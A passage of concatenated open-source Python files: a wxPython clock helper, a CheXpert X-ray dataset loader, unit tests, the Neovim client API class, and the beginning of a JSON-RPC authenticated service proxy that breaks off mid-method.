        return self.dyer.GetBorderWidth()

    def GetPolygon(self):
        # Index key 0 directly, consistent with GetOffset()/GetIsRotated().
        # The previous `self.ticks.values()[0]` also breaks on Python 3,
        # where dict views are not indexable; keys here are always 0..noe-1.
        a_tick = self.ticks[0]
        return a_tick.GetPolygon()

    def GetFont(self):
        return self.font

    def GetOffset(self):
        a_tick = self.ticks[0]
        return a_tick.GetOffset()

    def GetShadowColour(self):
        return self.dyer.GetShadowColour()

    def GetIsRotated(self):
        a_tick = self.ticks[0]
        return a_tick.GetIsRotated()

    def GetStyle(self):
        return self.style

    def SetSize(self, size):
        self.kwargs["size"] = size
        [tick.SetSize(size) for tick in self.ticks.values()]

    def SetFillColour(self, colour):
        self.dyer.SetFillColour(colour)

    def SetBorderColour(self, colour):
        self.dyer.SetBorderColour(colour)

    def SetBorderWidth(self, width):
        self.dyer.SetBorderWidth(width)

    def SetPolygon(self, polygon):
        [tick.SetPolygon(polygon) for tick in self.ticks.values()]

    def SetFont(self, font):
        self.font = font

    def SetOffset(self, offset):
        self.kwargs["offset"] = offset
        [tick.SetOffset(offset) for tick in self.ticks.values()]

    def SetShadowColour(self, colour):
        self.dyer.SetShadowColour(colour)

    def SetIsRotated(self, rotate):
        self.kwargs["rotate"] = rotate
        [tick.SetIsRotated(rotate) for tick in self.ticks.values()]

    def SetStyle(self, style):
        """Rebuild all ticks using the tick class registered for `style`."""
        self.style = style
        tickclass = allTickStyles[style]
        self.kwargs["rotate"] = self.parent.clockStyle & ROTATE_TICKS
        self.ticks = {}
        for i in range(self.noe):
            self.kwargs["idx"] = i
            self.ticks[i] = tickclass(**self.kwargs)
#----------------------------------------------------------------------
class Box:
    """Gathers info about the clock face and tick sets.

    The many GetTick*/SetTick* accessors all select tick sets via the same
    `target` bitmask; that selection is factored into private helpers below
    instead of being repeated in every method.
    """

    def __init__(self, parent, Face, TicksM, TicksH):
        self.parent = parent
        self.Face = Face
        self.TicksH = TicksH
        self.TicksM = TicksM

    def _ticksets(self, target):
        # Yield the tick sets (hours first, then minutes) whose bit is set
        # in the `target` mask; mirrors the module-wide _targets ordering.
        for i, attr in enumerate(["TicksH", "TicksM"]):
            if _targets[i] & target:
                yield getattr(self, attr)

    def _get(self, target, getter):
        # Collect getter(tickset) for every selected tick set, as a tuple.
        return tuple(getter(ts) for ts in self._ticksets(target))

    def _set(self, target, setter):
        # Apply setter(tickset) to every selected tick set.
        for ts in self._ticksets(target):
            setter(ts)

    def GetNiceRadiusForHands(self, centre):
        """Return a hand radius that clears the outermost minute and hour
        ticks (plus border width)."""
        a_tick = self.TicksM.ticks[0]
        scale = a_tick.GetScale()
        bw = max(self.TicksH.dyer.width / 2. * scale,
                 self.TicksM.dyer.width / 2. * scale)
        mgt = self.TicksM.ticks[59]
        my = mgt.pos.y + mgt.GetMaxSize(scale) + bw
        hgt = self.TicksH.ticks[11]
        hy = hgt.pos.y + hgt.GetMaxSize(scale) + bw
        niceradius = centre.y - max(my, hy)
        return niceradius

    def Draw(self, dc):
        # Draw the face first so the ticks end up on top of it.
        for attr in ["Face", "TicksM", "TicksH"]:
            getattr(self, attr).Draw(dc)

    def RecalcCoords(self, size, centre, scale):
        for attr in ["Face", "TicksH", "TicksM"]:
            getattr(self, attr).RecalcCoords(size, centre, scale)

    def GetTickSize(self, target):
        return self._get(target, lambda ts: ts.GetSize())

    def GetTickFillColour(self, target):
        return self._get(target, lambda ts: ts.GetFillColour())

    def GetTickBorderColour(self, target):
        return self._get(target, lambda ts: ts.GetBorderColour())

    def GetTickBorderWidth(self, target):
        return self._get(target, lambda ts: ts.GetBorderWidth())

    def GetTickPolygon(self, target):
        return self._get(target, lambda ts: ts.GetPolygon())

    def GetTickFont(self, target):
        return self._get(target, lambda ts: ts.GetFont())

    def GetIsRotated(self):
        a_tickset = self.TicksH
        return a_tickset.GetIsRotated()

    def GetTickOffset(self, target):
        return self._get(target, lambda ts: ts.GetOffset())

    def GetShadowColour(self):
        a_tickset = self.TicksH
        return a_tickset.GetShadowColour()

    def GetTickStyle(self, target):
        return self._get(target, lambda ts: ts.GetStyle())

    def SetTickSize(self, size, target):
        self._set(target, lambda ts: ts.SetSize(size))

    def SetTickFillColour(self, colour, target):
        self._set(target, lambda ts: ts.SetFillColour(colour))

    def SetTickBorderColour(self, colour, target):
        self._set(target, lambda ts: ts.SetBorderColour(colour))

    def SetTickBorderWidth(self, width, target):
        self._set(target, lambda ts: ts.SetBorderWidth(width))

    def SetTickPolygon(self, polygon, target):
        self._set(target, lambda ts: ts.SetPolygon(polygon))

    def SetTickFont(self, font, target):
        # Rebuild a fresh wx.Font per tick set from the native description,
        # so the sets don't end up sharing one mutable font object.
        fs = font.GetNativeFontInfoDesc()
        self._set(target, lambda ts: ts.SetFont(wx.FontFromNativeInfoString(fs)))

    def SetIsRotated(self, rotate):
        for attr in ["TicksH", "TicksM"]:
            getattr(self, attr).SetIsRotated(rotate)

    def SetTickOffset(self, offset, target):
        self._set(target, lambda ts: ts.SetOffset(offset))

    def SetShadowColour(self, colour):
        # Applies to both tick sets unconditionally (no target mask).
        for attr in ["TicksH", "TicksM"]:
            tick = getattr(self, attr)
            tick.SetShadowColour(colour)

    def SetTickStyle(self, style, target):
        self._set(target, lambda ts: ts.SetStyle(style))
#----------------------------------------------------------------------
# Relationship between styles and ticks class names.
# Used by TickSet.SetStyle() to instantiate the right tick class for a
# given TICKS_* style constant.
allTickStyles = {TICKS_BINARY: TickBinary,
                 TICKS_CIRCLE: TickCircle,
                 TICKS_DECIMAL: TickDecimal,
                 TICKS_HEX: TickHex,
                 TICKS_NONE: TickNone,
                 TICKS_POLY: TickPoly,
                 TICKS_ROMAN: TickRoman,
                 TICKS_SQUARE: TickSquare}
#
##
### eof
| ktan2020/legacy-automation | win/Lib/site-packages/wx-3.0-msw/wx/lib/analogclock/helpers.py | Python | mit | 28,246 |
import os
import logging
import numpy as np
from torch.utils.data import Dataset
import cv2
from PIL import Image
import subprocess
import torchvision.transforms as tfs
np.random.seed(0)  # fix the global NumPy seed so any NumPy-based randomness in this module is reproducible
def TransCommon(image):
    """Standard preprocessing: histogram equalization, then 3x3 Gaussian blur."""
    equalized = cv2.equalizeHist(image)
    blurred = cv2.GaussianBlur(equalized, (3, 3), 0)
    return blurred
def TransAug(image):
    """Train-time augmentation: a small random affine jitter of the image.

    NOTE(review): `fillcolor` is the legacy parameter name (renamed `fill`
    in newer torchvision) — confirm the pinned torchvision version.
    """
    augment = tfs.Compose([
        tfs.RandomAffine(degrees=(-15, 15), translate=(0.05, 0.05),
                         scale=(0.95, 1.05), fillcolor=128)
    ])
    return augment(image)
def GetTransforms(image, target=None, type='common'):
    """Dispatch to one of the named preprocessing pipelines.

    Args:
        image: the input image (format depends on the selected pipeline).
        target: not supported; must be None.
        type: pipeline name — 'Common' (equalize + blur), 'None' (identity)
            or 'Aug' (random affine augmentation). Surrounding whitespace is
            ignored.

    Returns:
        The transformed image ('None' returns the input unchanged).

    Raises:
        Exception: if `target` is given or `type` is not recognized.
    """
    # taget is not support now
    if target is not None:
        raise Exception(
            'Target is not support now ! ')
    # get type
    kind = type.strip()
    if kind == 'Common':
        return TransCommon(image)
    elif kind == 'None':
        return image
    elif kind == 'Aug':
        return TransAug(image)
    else:
        # Bug fix: the original format string had no '{}' placeholder, so
        # the offending type name was silently dropped from the message.
        raise Exception(
            'Unknown transforms_type : {}'.format(type))
class ImageDataset(Dataset):
    """CSV-driven chest X-ray dataset.

    Reads a label CSV whose first column is an image path (relative to
    ``data_path``) and whose later columns carry per-finding labels; only
    5 findings are kept (see the index filter in ``__init__``).
    """

    def __init__(self, data_path, label_path, cfg, mode='train', subsample_size=-1, subsample_seed=1234):
        self.cfg = cfg
        self._label_header = None
        self.data_path = data_path
        self._image_paths = []
        self._labels = []
        self._mode = mode
        # Two normalisation maps for CSV label cells:
        #   dict[0]: uncertain ('-1.0') and blank map to negative '0'
        #   dict[1]: uncertain ('-1.0') maps to positive '1'
        self.dict = [{'1.0': '1', '': '0', '0.0': '0', '-1.0': '0'},
                     {'1.0': '1', '': '0', '0.0': '0', '-1.0': '1'}, ]
        print(f'ImageDataset constructed with data_path = {self.data_path}')
        with open(label_path) as f:
            header = f.readline().strip('\n').split(',')
            # Names of the 5 findings that are kept, for reporting.
            self._label_header = [
                header[7],
                header[10],
                header[11],
                header[13],
                header[15]]
            for line in f:
                labels = []
                fields = line.strip('\n').split(',')
                # fields[0] is the image path, relative to data_path.
                image_path = os.path.join(self.data_path, os.path.expanduser(fields[0]))
                flg_enhance = False
                # Label columns start at field 5; the relative indices below
                # (2/5/6/8/10) correspond to CSV columns 7/10/11/13/15,
                # matching the header slice above.
                for index, value in enumerate(fields[5:]):
                    if index == 5 or index == 8:
                        # These findings treat uncertain ('-1.0') as positive.
                        labels.append(self.dict[1].get(value))
                        if self.dict[1].get(
                                value) == '1' and \
                                self.cfg.enhance_index.count(index) > 0:
                            flg_enhance = True
                    elif index == 2 or index == 6 or index == 10:
                        # These findings treat uncertain ('-1.0') as negative.
                        labels.append(self.dict[0].get(value))
                        if self.dict[0].get(
                                value) == '1' and \
                                self.cfg.enhance_index.count(index) > 0:
                            flg_enhance = True
                # labels = ([self.dict.get(n, n) for n in fields[5:]])
                labels = list(map(int, labels))
                self._image_paths.append(image_path)
                self._labels.append(labels)
                # Oversample positives of the configured findings at train
                # time by repeating the sample cfg.enhance_times extra times.
                if flg_enhance and self._mode == 'train':
                    for i in range(self.cfg.enhance_times):
                        self._image_paths.append(image_path)
                        self._labels.append(labels)
        self._num_image = len(self._image_paths)
        # NOTE(2020.04.30) we started using explicit config of data index, so disabling this dynamic subsampling
        # features to avoid confusion.
        assert subsample_size == -1
        # if subsample_size > 0:
        #     if subsample_size > self._num_image:
        #         raise AssertionError(f'subsample_size ({subsample_size}) should be less than {self._num_image}')
        #     rng = np.random.RandomState(seed=subsample_seed)
        #     idx = rng.choice(self._num_image, size=subsample_size, replace=False)
        #     self._image_paths = [self._image_paths[i] for i in idx]
        #     self._labels = [self._labels[i] for i in idx]
        #     self._num_image = len(self._labels)
        if cfg.cache_bitmap:
            self._bitmap_cache = self._build_bitmap_cache()
        else:
            self._bitmap_cache = None

    def __len__(self):
        # Length includes any train-time oversampling duplicates.
        return self._num_image

    def _border_pad(self, image):
        # Pad bottom/right so the image becomes a cfg.long_side square;
        # padding value depends on the cfg.border_pad mode.
        h, w, c = image.shape

        if self.cfg.border_pad == 'zero':
            image = np.pad(
                image,
                ((0, self.cfg.long_side - h),
                 (0, self.cfg.long_side - w), (0, 0)),
                mode='constant', constant_values=0.0
            )
        elif self.cfg.border_pad == 'pixel_mean':
            image = np.pad(
                image,
                ((0, self.cfg.long_side - h),
                 (0, self.cfg.long_side - w), (0, 0)),
                mode='constant', constant_values=self.cfg.pixel_mean
            )
        else:
            # Any other value is passed straight through as a numpy pad mode.
            image = np.pad(
                image,
                ((0, self.cfg.long_side - h),
                 (0, self.cfg.long_side - w), (0, 0)),
                mode=self.cfg.border_pad
            )

        return image

    def _fix_ratio(self, image):
        # Resize so the LONGER side equals cfg.long_side (preserving aspect
        # ratio), then pad the shorter side up to a square.
        h, w, c = image.shape

        if h >= w:
            ratio = h * 1.0 / w
            h_ = self.cfg.long_side
            w_ = round(h_ / ratio)
        else:
            ratio = w * 1.0 / h
            w_ = self.cfg.long_side
            h_ = round(w_ / ratio)

        image = cv2.resize(image, dsize=(w_, h_),
                           interpolation=cv2.INTER_LINEAR)
        image = self._border_pad(image)

        return image

    def _build_bitmap_cache(self):
        # Eagerly decode every image once; trades memory for epoch speed.
        print('Pre-loading all images...(might take a while)')
        return [self._load_image(idx) for idx in range(self._num_image)]

    def _load_image(self, idx):
        # Flag 0 = load as single-channel grayscale.
        image = cv2.imread(self._image_paths[idx], 0)
        image = Image.fromarray(image)
        return image

    def __getitem__(self, idx):
        if self._bitmap_cache is not None:
            image = self._bitmap_cache[idx]
        else:
            image = self._load_image(idx)
        # Random augmentation only at train time.
        if self._mode == 'train':
            image = GetTransforms(image, type=self.cfg.use_transforms_type)
        image = np.array(image)
        if self.cfg.use_equalizeHist:
            image = cv2.equalizeHist(image)
        # Replicate the grayscale channel to 3-channel RGB for the backbone.
        image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB).astype(np.float32)
        if self.cfg.fix_ratio:
            image = self._fix_ratio(image)
        else:
            image = cv2.resize(image, dsize=(self.cfg.width, self.cfg.height),
                               interpolation=cv2.INTER_LINEAR)
        if self.cfg.gaussian_blur > 0:
            image = cv2.GaussianBlur(image, (self.cfg.gaussian_blur,
                                             self.cfg.gaussian_blur), 0)
        # normalization
        image -= self.cfg.pixel_mean
        # vgg and resnet do not use pixel_std, densenet and inception use.
        if self.cfg.use_pixel_std:
            image /= self.cfg.pixel_std
        # normal image tensor :  H x W x C
        # torch image tensor :   C X H X W
        image = image.transpose((2, 0, 1))
        labels = np.array(self._labels[idx]).astype(np.float32)

        path = self._image_paths[idx]

        # Return shape depends on mode: labels for train/dev, path for test,
        # both for heatmap generation.
        if self._mode == 'train' or self._mode == 'dev':
            return (image, labels)
        elif self._mode == 'test':
            return (image, path)
        elif self._mode == 'heatmap':
            return (image, path, labels)
        else:
            raise Exception('Unknown mode : {}'.format(self._mode))
| google-research/understanding-transfer-learning | third_party/chexpert_data/chexpert.py | Python | apache-2.0 | 7,524 |
__author__ = 'Alex Baranov'  # module author metadata
import unittest
from time import *
import numpy as np
from ..discrete.inequalities import chernikov as c
class TestFind_system_of_fundamental_solutions(unittest.TestCase):
    """Tests for the Chernikov method of finding systems of fundamental
    solutions (Python 2 module: note the print statements below)."""

    def _test_pulp(self):
        # Leading underscore keeps this out of unittest discovery; it is a
        # manual smoke test of the PuLP LP solver, not of the Chernikov code.
        import pulp as p

        prob = p.LpProblem("The Whiskas Problem", p.LpMinimize)

        elapsed = -clock()

        # creating variables
        x1 = p.LpVariable("ChickenPercent", 0, None, p.LpInteger)
        x2 = p.LpVariable("BeefPercent", 0, None, p.LpInteger)

        # goal function
        a = 0.013 * x1 + 0.008 * x2
        prob += 0.013 * x1 + 0.008 * x2

        # constraints
        prob += x1 + x2 == 100, "PercentagesSum"
        prob += 0.100 * x1 + 0.200 * x2 >= 8.0, "ProteinRequirement"
        prob += 0.080 * x1 + 0.100 * x2 >= 6.0, "FatRequirement"
        prob += 0.001 * x1 + 0.005 * x2 <= 2.0, "FibreRequirement"
        prob += 0.002 * x1 + 0.005 * x2 <= 0.4, "SaltRequirement"

        # solution
        prob.writeLP("WhiskasModel.lp")
        prob.solve(p.GLPK(msg=0))

        print "Status:", p.LpStatus[prob.status]

        for v in prob.variables():
            print v.name, "=", v.varValue

        print "Total Cost of Ingredients per can = ", p.value(prob.objective)

        # NOTE(review): '+clock()' just reassigns elapsed; 'elapsed += clock()'
        # was probably intended for the timing to be meaningful.
        elapsed = +clock()
        print "Solution time = ", prob.solutionTime
        print "Solution time2 = ", elapsed

    def test_find_system_of_fundamental_solutions(self):
        """
        Verify simple scenario for Chernikov method
        """
        # Each inner list is one equation's coefficient row.
        sys = [[-5,-5,6,-8,-10,0],[0,-5,3,1,0,-10]]
        result1 = c.find_sfs_of_equation_system(sys)
        expected1 = np.array([[ 12.,   0.,  10.,   0.,   0.,   3.],
                              [  0.,   0.,   8.,   6.,   0.,   3.],
                              [  0.,   0.,  10.,   0.,   6.,   3.],
                              [  3.,   3.,   5.,   0.,   0.,   0.],
                              [  0.,   2.,   3.,   1.,   0.,   0.],
                              [  0.,   6.,  10.,   0.,   3.,   0.]])

        self.assertTrue(np.array_equal(expected1,np.array(result1)))

        # Same check for a system of even (non-strict) inequalities.
        sys2 = [[1,-1,3,-8,5],[-1,2,-1,1,-1],[2,-1,-2,1,0],[-3,1,-1,6,-3],[1,1,-3,2,-1]]
        result2 = c.find_sfs_of_even_inequalities_system(sys2)

        expected2 = np.array([[ 13.,   0.,  17.,   8.,   0.],
                              [ 15.,  11.,  12.,   5.,   0.],
                              [  5.,   0.,   9.,   4.,   0.],
                              [  5.,   5.,   8.,   3.,   0.],
                              [  2.,   0.,   3.,   2.,   1.],
                              [ 11.,   0.,  15.,   8.,   0.],
                              [ 13.,   9.,  12.,   7.,   0.],
                              [  1.,   1.,   1.,   1.,   1.]])

        self.assertTrue(np.array_equal(expected2, np.array(result2)))
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
| stonelake/pyoptimization | pyopt/tests/test_find_system_of_fundamental_solutions.py | Python | apache-2.0 | 2,808 |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nested_tags
def test_root():
    """The root-level tagged method should report the 'root' tag."""
    result = nested_tags.root_method()
    assert result == 'root'
def test_nested():
    """The nested tagged method should report the 'nested' tag."""
    result = nested_tags.nested_method()
    assert result == 'nested'
| GoogleCloudPlatform/repo-automation-playground | wizard-py/test_data/parser/nested_tags/nested_tags_test.py | Python | apache-2.0 | 754 |
"""Main Nvim interface."""
import os
from msgpack import ExtType
from .buffer import Buffer
from .common import (DecodeHook, Remote, RemoteMap, RemoteSequence,
SessionFilter, SessionHook, walk)
from .tabpage import Tabpage
from .window import Window
from ..compat import IS_PYTHON3
# Public API of this module. Bug fix: the trailing comma makes this a
# 1-tuple — a bare parenthesized string is just a string, which
# `from ... import *` would iterate character by character.
__all__ = ('Nvim',)

# Keep a reference to the real os.chdir, since Nvim.chdir wraps it.
os_chdir = os.chdir
class Nvim(object):
    """Class that represents a remote Nvim instance.

    This class is main entry point to Nvim remote API, it is a thin wrapper
    around Session instances.

    The constructor of this class must not be called directly. Instead, the
    `from_session` class method should be used to create the first instance
    from a raw `Session` instance.

    Subsequent instances for the same session can be created by calling the
    `with_hook` instance method and passing a SessionHook instance. This can
    be useful to have multiple `Nvim` objects that behave differently without
    one affecting the other.
    """

    # NOTE(review): several methods below accept a keyword argument named
    # `async`, which became a reserved word in Python 3.7+. As written this
    # module only parses on older interpreters; renaming the argument would
    # change the public API, so the code is left untouched here.

    @classmethod
    def from_session(cls, session):
        """Create a new Nvim instance for a Session instance.

        This method must be called to create the first Nvim instance, since it
        queries Nvim metadata for type information and sets a SessionHook for
        creating specialized objects from Nvim remote handles.
        """
        # Error responses arrive as (code, message) pairs; surface only the
        # human-readable message through NvimError.
        session.error_wrapper = lambda e: NvimError(e[1])
        channel_id, metadata = session.request(b'vim_get_api_info')

        # Configure the msgpack packer with Nvim's 'encoding' option.
        encoding = session.request(b'vim_get_option', b'encoding')
        session._async_session._msgpack_stream.set_packer_encoding(encoding)

        if IS_PYTHON3:
            hook = DecodeHook()
            # decode all metadata strings for python3
            metadata = walk(hook.from_nvim, metadata, None, None, None)

        # Map msgpack ExtType codes (from the API metadata) to the wrapper
        # classes that ExtHook will instantiate.
        types = {
            metadata['types']['Buffer']['id']: Buffer,
            metadata['types']['Window']['id']: Window,
            metadata['types']['Tabpage']['id']: Tabpage,
        }

        return cls(session, channel_id, metadata).with_hook(ExtHook(types))

    def __init__(self, session, channel_id, metadata):
        """Initialize a new Nvim instance. This method is module-private."""
        self._session = session
        self.channel_id = channel_id
        self.metadata = metadata
        # Remote containers: lazy views backed by RPC requests.
        self.vars = RemoteMap(session, 'vim_get_var', 'vim_set_var')
        self.vvars = RemoteMap(session, 'vim_get_vvar', None)
        self.options = RemoteMap(session, 'vim_get_option', 'vim_set_option')
        self.buffers = RemoteSequence(session, 'vim_get_buffers')
        self.windows = RemoteSequence(session, 'vim_get_windows')
        self.tabpages = RemoteSequence(session, 'vim_get_tabpages')
        self.current = Current(session)
        self.error = NvimError

    def with_hook(self, hook):
        """Initialize a new Nvim instance."""
        return Nvim(SessionFilter(self.session, hook), self.channel_id,
                    self.metadata)

    @property
    def session(self):
        """Return the Session or SessionFilter for a Nvim instance."""
        return self._session

    def ui_attach(self, width, height, rgb):
        """Register as a remote UI.

        After this method is called, the client will receive redraw
        notifications.
        """
        return self._session.request('ui_attach', width, height, rgb)

    def ui_detach(self):
        """Unregister as a remote UI."""
        return self._session.request('ui_detach')

    def ui_try_resize(self, width, height):
        """Notify nvim that the client window has resized.

        If possible, nvim will send a redraw request to resize.
        """
        return self._session.request('ui_try_resize', width, height)

    def subscribe(self, event):
        """Subscribe to a Nvim event."""
        return self._session.request('vim_subscribe', event)

    def unsubscribe(self, event):
        """Unsubscribe to a Nvim event."""
        return self._session.request('vim_unsubscribe', event)

    def command(self, string, async=False):
        """Execute a single ex command."""
        return self._session.request('vim_command', string, async=async)

    def command_output(self, string):
        """Execute a single ex command and return the output."""
        return self._session.request('vim_command_output', string)

    def eval(self, string, async=False):
        """Evaluate a vimscript expression."""
        return self._session.request('vim_eval', string, async=async)

    def strwidth(self, string):
        """Return the number of display cells `string` occupies.

        Tab is counted as one cell.
        """
        return self._session.request('vim_strwidth', string)

    def list_runtime_paths(self):
        """Return a list of paths contained in the 'runtimepath' option."""
        return self._session.request('vim_list_runtime_paths')

    def foreach_rtp(self, cb):
        """Invoke `cb` for each path in 'runtimepath'.

        Call the given callable for each path in 'runtimepath' until either
        callable returns something but None, the exception is raised or there
        are no longer paths. If stopped in case callable returned non-None,
        vim.foreach_rtp function returns the value returned by callable.
        """
        for path in self._session.request('vim_list_runtime_paths'):
            try:
                if cb(path) is not None:
                    break
            except Exception:
                # Any exception from the callback also stops the iteration.
                break

    def chdir(self, dir_path):
        """Run os.chdir, then all appropriate vim stuff."""
        # Change the host process cwd first, then tell Nvim to follow.
        os_chdir(dir_path)
        return self._session.request('vim_change_directory', dir_path)

    def feedkeys(self, keys, options='', escape_csi=True):
        """Push `keys` to Nvim user input buffer.

        Options can be a string with the following character flags:
        - 'm': Remap keys. This is default.
        - 'n': Do not remap keys.
        - 't': Handle keys as if typed; otherwise they are handled as if coming
               from a mapping. This matters for undo, opening folds, etc.
        """
        return self._session.request('vim_feedkeys', keys, options, escape_csi)

    def input(self, bytes):
        """Push `bytes` to Nvim low level input buffer.

        Unlike `feedkeys()`, this uses the lowest level input buffer and the
        call is not deferred. It returns the number of bytes actually
        written(which can be less than what was requested if the buffer is
        full).
        """
        return self._session.request('vim_input', bytes)

    def replace_termcodes(self, string, from_part=False, do_lt=True,
                          special=True):
        r"""Replace any terminal code strings by byte sequences.

        The returned sequences are Nvim's internal representation of keys,
        for example:

        <esc> -> '\x1b'
        <cr>  -> '\r'
        <c-l> -> '\x0c'
        <up>  -> '\x80ku'

        The returned sequences can be used as input to `feedkeys`.
        """
        return self._session.request('vim_replace_termcodes', string,
                                     from_part, do_lt, special)

    def out_write(self, msg):
        """Print `msg` as a normal message."""
        return self._session.request('vim_out_write', msg)

    def err_write(self, msg):
        """Print `msg` as an error message."""
        return self._session.request('vim_err_write', msg)

    def quit(self, quit_command='qa!'):
        """Send a quit command to Nvim.

        By default, the quit command is 'qa!' which will make Nvim quit without
        saving anything.
        """
        try:
            self.command(quit_command)
        except IOError:
            # sending a quit command will raise an IOError because the
            # connection is closed before a response is received. Safe to
            # ignore it.
            pass
class Current(object):

    """Helper class for emulating vim.current from python-vim."""

    def __init__(self, session):
        self._session = session
        # NOTE(review): `range` is initialized to None and never assigned in
        # this class; it appears to be populated by external code — confirm
        # with callers.
        self.range = None

    @property
    def line(self):
        """The current line, fetched from Nvim on each access."""
        return self._session.request('vim_get_current_line')

    @line.setter
    def line(self, line):
        return self._session.request('vim_set_current_line', line)

    @property
    def buffer(self):
        """The current buffer, fetched from Nvim on each access."""
        return self._session.request('vim_get_current_buffer')

    @buffer.setter
    def buffer(self, buffer):
        return self._session.request('vim_set_current_buffer', buffer)

    @property
    def window(self):
        """The current window, fetched from Nvim on each access."""
        return self._session.request('vim_get_current_window')

    @window.setter
    def window(self, window):
        return self._session.request('vim_set_current_window', window)

    @property
    def tabpage(self):
        """The current tabpage, fetched from Nvim on each access."""
        return self._session.request('vim_get_current_tabpage')

    @tabpage.setter
    def tabpage(self, tabpage):
        return self._session.request('vim_set_current_tabpage', tabpage)
class ExtHook(SessionHook):
    """Session hook converting between msgpack ExtType values and the
    corresponding Remote wrapper objects (Buffer/Window/Tabpage)."""

    def __init__(self, types):
        self.types = types
        super(ExtHook, self).__init__(from_nvim=self.from_ext,
                                      to_nvim=self.to_ext)

    def from_ext(self, obj, session, method, kind):
        # Exact-type check on purpose: only raw ExtType values are wrapped.
        if type(obj) is not ExtType:
            return obj
        wrapper_cls = self.types[obj.code]
        return wrapper_cls(session, (obj.code, obj.data))

    def to_ext(self, obj, session, method, kind):
        if not isinstance(obj, Remote):
            return obj
        return ExtType(*obj.code_data)
class NvimError(Exception):
    """Exception raised for errors reported by the Nvim server."""
    pass
| 0x90sled/python-client | neovim/api/nvim.py | Python | apache-2.0 | 9,543 |
"""
Copyright 2011 Jeff Garzik
AuthServiceProxy has the following improvements over python-jsonrpc's
ServiceProxy class:
- HTTP connections persist for the life of the AuthServiceProxy object
(if server supports HTTP/1.1)
- sends protocol 'version', per JSON-RPC 1.1
- sends proper, incrementing 'id'
- sends Basic HTTP authentication headers
- parses all JSON numbers that look like floats as Decimal
- uses standard Python json lib
Previous copyright, from python-jsonrpc/jsonrpc/proxy.py:
Copyright (c) 2007 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
try:
import http.client as httplib
except ImportError:
import httplib
import base64
import decimal
import json
import logging
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
USER_AGENT = "AuthServiceProxy/0.1"  # sent with every HTTP request
HTTP_TIMEOUT = 30  # default socket timeout, in seconds
log = logging.getLogger("DiamondRPC")  # module-wide logger for RPC tracing
class JSONRPCException(Exception):
    """Raised when a JSON-RPC response carries a non-null 'error' member.

    The raw error object from the server is kept in ``self.error``.
    """
    def __init__(self, rpc_error):
        Exception.__init__(self)
        self.error = rpc_error
def EncodeDecimal(o):
    """``json.dumps`` default hook: render Decimal values rounded to 8 places."""
    if not isinstance(o, decimal.Decimal):
        raise TypeError(repr(o) + " is not JSON serializable")
    return round(o, 8)
class AuthServiceProxy(object):
    """JSON-RPC proxy with HTTP Basic auth and a persistent connection.

    Attribute access returns nested proxies, so ``proxy.a.b(args)`` issues
    a call to the dotted method name ``"a.b"``.
    """

    # Class-level (shared across ALL instances) request-id counter; name is
    # mangled to _AuthServiceProxy__id_count.
    __id_count = 0

    def __init__(self, service_url, service_name=None, timeout=HTTP_TIMEOUT, connection=None):
        self.__service_url = service_url
        self.__service_name = service_name
        self.__url = urlparse.urlparse(service_url)
        # NOTE(review): the port defaults to 80 even for https URLs without
        # an explicit port — confirm this is intended.
        if self.__url.port is None:
            port = 80
        else:
            port = self.__url.port
        (user, passwd) = (self.__url.username, self.__url.password)
        # Credentials may be str or None; encode to bytes when possible.
        try:
            user = user.encode('utf8')
        except AttributeError:
            pass
        try:
            passwd = passwd.encode('utf8')
        except AttributeError:
            pass
        # Pre-compute the Basic auth header once.
        authpair = user + b':' + passwd
        self.__auth_header = b'Basic ' + base64.b64encode(authpair)

        if connection:
            # Callables re-use the connection of the original proxy
            self.__conn = connection
        elif self.__url.scheme == 'https':
            self.__conn = httplib.HTTPSConnection(self.__url.hostname, port,
                                                  None, None, False,
                                                  timeout)
        else:
            self.__conn = httplib.HTTPConnection(self.__url.hostname, port,
                                                 False, timeout)

    def __getattr__(self, name):
        """Build a child proxy for the dotted method name `name`."""
        if name.startswith('__') and name.endswith('__'):
            # Python internal stuff
            raise AttributeError
        if self.__service_name is not None:
            name = "%s.%s" % (self.__service_name, name)
        return AuthServiceProxy(self.__service_url, name, connection=self.__conn)

    def __call__(self, *args):
        """Issue the JSON-RPC request for this proxy's method name."""
        AuthServiceProxy.__id_count += 1

        log.debug("-%s-> %s %s"%(AuthServiceProxy.__id_count, self.__service_name,
                                 json.dumps(args, default=EncodeDecimal)))
        postdata = json.dumps({'version': '1.1',
                               'method': self.__service_name,
                               'params': args,
                               'id': AuthServiceProxy.__id_count}, default=EncodeDecimal)
        self.__conn.request('POST', self.__url.path, postdata,
                            {'Host': self.__url.hostname,
                             'User-Agent': USER_AGENT,
                             'Authorization': self.__auth_header,
                             'Content-type': 'application/json'})

        response = self._get_response()
        if response['error'] is not None:
            raise JSONRPCException(response['error'])
        elif 'result' not in response:
            raise JSONRPCException({
                'code': -343, 'message': 'missing JSON-RPC result'})
        else:
            return response['result']

    def _batch(self, rpc_call_list):
        """Send a pre-built list of JSON-RPC calls as one batch request."""
        postdata = json.dumps(list(rpc_call_list), default=EncodeDecimal)
        log.debug("--> "+postdata)
        self.__conn.request('POST', self.__url.path, postdata,
                            {'Host': self.__url.hostname,
                             'User-Agent': USER_AGENT,
                             'Authorization': self.__auth_header,
                             'Content-type': 'application/json'})

        return self._get_response()

    def _get_response(self):
        """Read and decode the pending HTTP response as JSON.

        Float-looking numbers are parsed as Decimal to avoid precision loss.
        """
        http_response = self.__conn.getresponse()
        if http_response is None:
            raise JSONRPCException({
